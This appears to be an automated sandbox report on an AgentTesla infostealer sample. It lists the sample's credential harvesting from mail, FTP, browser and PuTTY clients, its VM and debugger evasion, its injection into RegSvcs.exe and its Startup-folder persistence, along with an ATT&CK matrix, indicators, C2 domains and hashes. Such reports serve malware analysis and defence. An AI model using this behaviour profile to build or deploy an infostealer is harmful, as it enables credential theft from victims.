                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: cunila.exeBinary or memory string: WIN_81
                    Source: cunila.exeBinary or memory string: WIN_XP
                    Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                    Source: cunila.exeBinary or memory string: WIN_XPe
                    Source: cunila.exeBinary or memory string: WIN_VISTA
                    Source: cunila.exeBinary or memory string: WIN_7
                    Source: cunila.exeBinary or memory string: WIN_8
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00901204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00901204
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_00901806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00901806
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_005A1204
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_005A1806

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS138
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets841
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Cached Domain Credentials331
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job331
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584881 Sample: SAL987656700.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 30 ftp.antoniomayol.com 2->30 32 antoniomayol.com 2->32 34 2 other IPs or domains 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 12 other signatures 2->46 8 SAL987656700.exe 3 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\cunila.exe, PE32 8->26 dropped 62 Binary is likely a compiled AutoIt script file 8->62 64 Found API chain indicative of sandbox detection 8->64 14 cunila.exe 1 8->14         started        66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->66 18 cunila.exe 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\cunila.vbs, data 14->28 dropped 68 Antivirus detection for dropped file 14->68 70 Multi AV Scanner detection for dropped file 14->70 72 Binary is likely a compiled AutoIt script file 14->72 78 5 other signatures 14->78 20 RegSvcs.exe 15 2 14->20         started        74 Writes to foreign memory regions 18->74 76 Maps a DLL or memory area into another process 18->76 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 antoniomayol.com 162.241.62.63, 21, 32929, 49705 UNIFIEDLAYER-AS-1US United States 20->36 38 ip-api.com 208.95.112.1, 49704, 49706, 80 TUT-ASUS United States 20->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->48 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 20->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal ftp login credentials 24->58 60 Tries to harvest and steal browser information (history, passwords, etc) 24->60 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SAL987656700.exe45%ReversingLabsWin32.Spyware.Negasteal
                    SAL987656700.exe100%AviraDR/AutoIt.Gen8
                    SAL987656700.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\enterogenous\cunila.exe100%AviraDR/AutoIt.Gen8
                    C:\Users\user\AppData\Local\enterogenous\cunila.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\enterogenous\cunila.exe45%ReversingLabsWin32.Spyware.Negasteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ftp.antoniomayol.com0%Avira URL Cloudsafe
                    http://antoniomayol.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    antoniomayol.com
                    		162.241.62.63
                    		truetrue
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        ftp.antoniomayol.com
                        		unknown
                        		unknowntrue
                          		unknown
                          171.39.242.20.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line/?fields=hostingfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://antoniomayol.comRegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ftp.antoniomayol.comRegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://account.dyn.com/cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ip-api.comRegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    208.95.112.1
                                    		ip-api.comUnited States
                                    		53334TUT-ASUSfalse
                                    162.241.62.63
                                    		antoniomayol.comUnited States
                                    		46606UNIFIEDLAYER-AS-1UStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1584881
                                    Start date and time:2025-01-06 17:02:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SAL987656700.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@3/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 46
                                    • Number of non-executed functions: 307
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45, 20.242.39.171, 20.12.23.50
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: SAL987656700.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:03:04API Interceptor8678012x Sleep call for process: RegSvcs.exe modified
                                    17:03:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    208.95.112.1Resource.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    SharkHack.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    paint.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                    • ip-api.com/json/?fields=225545
                                    ddos tool.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    162.241.62.63Order 122001-220 guanzo.exeGet hashmaliciousFormBookBrowse
                                    • www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ip-api.comResource.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    SharkHack.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    paint.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    ddos tool.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    antoniomayol.comDSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                    • 15.197.240.20

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    UNIFIEDLAYER-AS-1UShttps://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8Get hashmaliciousUnknownBrowse
                                    • 162.214.80.73
                                    https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63a%2F3274607708%2FSmartadvocate%2F%23%3Fnl=ZGF5aGFuYXJhQHNtYXJ0YWR2b2NhdGUuY29t/1/010901943144e678-be97f397-fbf4-4935-81cc-f9ffe0e007ba-000000/Ra9zEF9F5Gh7LdH-GSmxaBW3ylU=188Get hashmaliciousScreenConnect ToolBrowse
                                    • 50.116.112.103
                                    https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188Get hashmaliciousScreenConnect ToolBrowse
                                    • 50.116.112.103
                                    AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                    • 162.214.122.223
                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                    • 50.87.220.8
                                    4.elfGet hashmaliciousUnknownBrowse
                                    • 173.83.210.158
                                    fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                    • 98.130.46.22
                                    Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                    • 162.215.116.7
                                    https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                    • 162.241.149.91
                                    http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                    • 192.185.79.204
                                    TUT-ASUSResource.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    SharkHack.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1
                                    paint.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                    • 208.95.112.1
                                    ddos tool.exeGet hashmaliciousXWormBrowse
                                    • 208.95.112.1

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\gunfights

                                    Download File
                                    Process:C:\Users\user\Desktop\SAL987656700.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):245248
                                    Entropy (8bit):6.534796453012243
                                    Encrypted:false
                                    SSDEEP:3072:010xGZS1npfbJMeYNm6iaBasoa2MWZyAzOBndUxVRdZNeviWYYaMXcL/CdwhfA9V:OgPbboyMWZvzxVRMfAzCdF9ihw
                                    MD5:EF21E86AE3A5A36104D1383C061B83E7
                                    SHA1:53823269083797EAD7F1230BE529D8C543D2001D
                                    SHA-256:16C630D5DC716EEB21C6979C2E19E8D72A5E7B742E1B10AAAB0D0D0F38AFD94B
                                    SHA-512:A980DF1FCFBF88A80D28CF758FB9933C0B223246B5C856E1728C872B422925513FA1CB34ECF73B43D887E34A3FEEDEA446DD912D31A7C1B5C8603D8E68962F42
                                    Malicious:false
                                    Reputation:low
                                    Preview:...0:AQDJAC9..WL.OC09AQD.AC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9.9WLZP.>9.X.o.Bu...$=<c@K.66/,cZ%W9# o!U.3$*n(-..v.l9 'U.L\NjAC9D9WL..C0u@RD=.._D9WLTOC0.ASEE@H9D.TLTGC09AQD..@9D.WLT.@09A.DNaC9D;WLPOC09AQDJAC9D9WLToG09CQDNAC9F9..TOS09QQDNAS9D)WLTOC0)AQDNAC9D9WLX.@0vAQDN.@9.<WLTOC09AQDNAC9D9WLTOG05AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNaC9L9WLTOC09AQDFaC9.9WLTOC09AQD`5&A09WL0.@09aQDN.@9D;WLTOC09AQDNAC9d9W,z=0BZAQD.DC9D.TLTIC09.RDNAC9D9WLTOC0yAQ.`3&U+ZWLXOC09AUDNCC9D.TLTOC09AQDNAC9.9W.TOC09AQDNAC9D9WL..@09AQD.AC9F9RL..A0QtPDMAC9E9WJTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLTOC09AQDNAC9D9WLI......z.<}3&>.j.(.3..B..8.vKxB./[..r.\.....cLQ..O.?...G...L.DQ6B....v!HHJQ.;{@".$....|bM.r.J:.9.../v./E......i`...K:....M..7 ..X1!(+o.X"X%%.M.19AQD.......=7.j.B^ZzS;o..`];f...0AC9 9WL&OC0XAQD.AC9+9WL:OC0GAQD0AC9.9WL.OC0.AQDkAC9)9WLpOC0GAQD.<L6..%'.09AQD{....T.........r?.=b&....+.{..T..N+.3z....M..*..Y.(?gw.KUIG5;FUGB|Mr...mVKG5;FUGB|Mr...m.i.....?....C.0TOC09A.DN.C9D..L.OC0.A.D..C9D..L.O.0...D

                                    C:\Users\user\AppData\Local\enterogenous\cunila.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\SAL987656700.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Category:dropped
                                    Size (bytes):892416
                                    Entropy (8bit):7.964461200331325
                                    Encrypted:false
                                    SSDEEP:12288:9sHzOUNUSB/o5LsI1uwajJ5yvv1l2lclTUX1MDc35Qx3tkscoP80In35zFYoRn33:UiUmSB/o5d1ubcv620n356C0IpZnJGO
                                    MD5:A885A9C7468691538B78D54852B5A59C
                                    SHA1:1B2340A366A6B28AC9D30F31BACEF95AFD0DE595
                                    SHA-256:D2D196A12C822020C4042D607BE77746951B6CB3C16201FF21CA8E9C5C786209
                                    SHA-512:903C918EF94C4DD9C8277C7CFFE2774A26AF285E1E41DCF71C5C3AEE1FC65D1202A2EB227267BB044C050299ACBFB67B970CA75E17F5DA1FC48E89472F45173C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 45%
                                    Reputation:low
